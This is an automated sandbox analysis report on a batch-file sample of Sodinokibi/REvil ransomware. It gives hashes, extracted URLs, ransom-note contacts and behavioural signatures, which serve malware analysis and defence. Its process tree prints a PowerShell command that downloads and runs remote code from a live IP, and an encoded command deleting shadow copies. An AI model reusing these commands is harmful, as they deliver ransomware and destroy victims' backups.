Analysis
Max time kernel: 17s
Max time network: 55s
Platform: windows7_x64
Resource: win7v200430
Submitted: 15-05-2020 20:10

Tasks
- Static task: static1
- Behavioral task: behavioral1
  Sample: 74b8e8ad8fe5aea82ec95a707e3c2b94.bat
  Resource: win7v200430
- Behavioral task: behavioral2
  Sample: 74b8e8ad8fe5aea82ec95a707e3c2b94.bat
  Resource: win10v200430
General
Target: 74b8e8ad8fe5aea82ec95a707e3c2b94.bat
Size: 214B
MD5: 220dc0fc858c664ba5223cbab7e4b312
SHA1: 94f095bd648c7c3f4845e3c419b74baa7662f2ae
SHA256: 94d89a44ea5da3649df80f6898cb30415f2df92c0060d36d5f9afa3806862a2a
SHA512: 119c413acb39f51f4d668c5bc48793f60b91717e1623e22d666221c26e78cfa3667e7aa2141b26e15aa3936d86ba498ae280decd9889a77f8706459d0f295772
Malware Config
Extracted (URL): http://185.103.242.78/pastes/74b8e8ad8fe5aea82ec95a707e3c2b94
Extracted (ransom note): C:\ysm83m-readme.txt
Family: sodinokibi
Contact URLs listed in the note:
- http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CFB753AC85BE73BF
- http://decryptor.cc/CFB753AC85BE73BF
Signatures

Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
description | pid | process
Token: SeDebugPrivilege | 108 | powershell.exe
Token: SeDebugPrivilege | 108 | powershell.exe
Token: SeDebugPrivilege | 1172 | powershell.exe
Token: SeBackupPrivilege | 464 | vssvc.exe
Token: SeRestorePrivilege | 464 | vssvc.exe
Token: SeAuditPrivilege | 464 | vssvc.exe
Token: SeTakeOwnershipPrivilege | 108 | powershell.exe
Enumerates connected drives (3 TTPs)
Drops file in Program Files directory (26 IoCs)
Processes: powershell.exe
description | ioc | process
File opened for modification | \??\c:\program files\InitializeSubmit.vstm | powershell.exe
File opened for modification | \??\c:\program files\RegisterGet.mp4 | powershell.exe
File opened for modification | \??\c:\program files\UseWait.mpeg | powershell.exe
File opened for modification | \??\c:\program files\CloseCompare.001 | powershell.exe
File opened for modification | \??\c:\program files\DenyAssert.3gp2 | powershell.exe
File opened for modification | \??\c:\program files\DebugConnect.shtml | powershell.exe
File opened for modification | \??\c:\program files\NewMount.3gpp | powershell.exe
File opened for modification | \??\c:\program files\PushPop.MTS | powershell.exe
File opened for modification | \??\c:\program files\RenameSplit.gif | powershell.exe
File opened for modification | \??\c:\program files\UnblockExpand.dot | powershell.exe
File opened for modification | \??\c:\program files\WatchLimit.jpeg | powershell.exe
File created | \??\c:\program files (x86)\ysm83m-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\CheckpointNew.pcx | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\ysm83m-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\RedoRestart.asf | powershell.exe
File opened for modification | \??\c:\program files\SkipExpand.ttc | powershell.exe
File opened for modification | \??\c:\program files\SyncExit.TS | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\ysm83m-readme.txt | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\ysm83m-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\ConvertFromCompare.aiff | powershell.exe
File opened for modification | \??\c:\program files\MergePop.gif | powershell.exe
File opened for modification | \??\c:\program files\MountCopy.docx | powershell.exe
File opened for modification | \??\c:\program files\ProtectRevoke.xla | powershell.exe
File opened for modification | \??\c:\program files\WatchSync.vb | powershell.exe
File created | \??\c:\program files\ysm83m-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\ClearUnlock.snd | powershell.exe
Sodin / Sodinokibi / REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Suspicious use of WriteProcessMemory (5 IoCs)
Processes: cmd.exe, powershell.exe
description | pid | process | target process
PID 1524 wrote to memory of 108 | 1524 | cmd.exe | powershell.exe
PID 108 wrote to memory of 1172 | 108 | powershell.exe | powershell.exe
PID 108 wrote to memory of 1172 | 108 | powershell.exe | powershell.exe
PID 108 wrote to memory of 1172 | 108 | powershell.exe | powershell.exe
PID 108 wrote to memory of 1172 | 108 | powershell.exe | powershell.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: powershell.exe, powershell.exe
pid | process
108 | powershell.exe
108 | powershell.exe
108 | powershell.exe
1172 | powershell.exe
1172 | powershell.exe
Blacklisted process makes network request (1 IoC)
Processes: powershell.exe
flow | pid | process
1 | 108 | powershell.exe
Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes: powershell.exe
pid | process
108 | powershell.exe
Processes

- C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\74b8e8ad8fe5aea82ec95a707e3c2b94.bat"
  PID: 1524
  Signatures:
  - Suspicious use of WriteProcessMemory

  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (child of PID 1524)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/74b8e8ad8fe5aea82ec95a707e3c2b94');Invoke-ZUMTYKU;Start-Sleep -s 10000"
    PID: 108
    Signatures:
    - Suspicious use of AdjustPrivilegeToken
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Suspicious behavior: CmdExeWriteProcessMemorySpam

    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (child of PID 108)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (The -e argument is Base64 over UTF-16LE; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} — a shadow-copy deletion, which accounts for the vssvc.exe activity and the "Modifies service" signature below.)
      PID: 1172
      Signatures:
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses

- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 464
  Signatures:
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service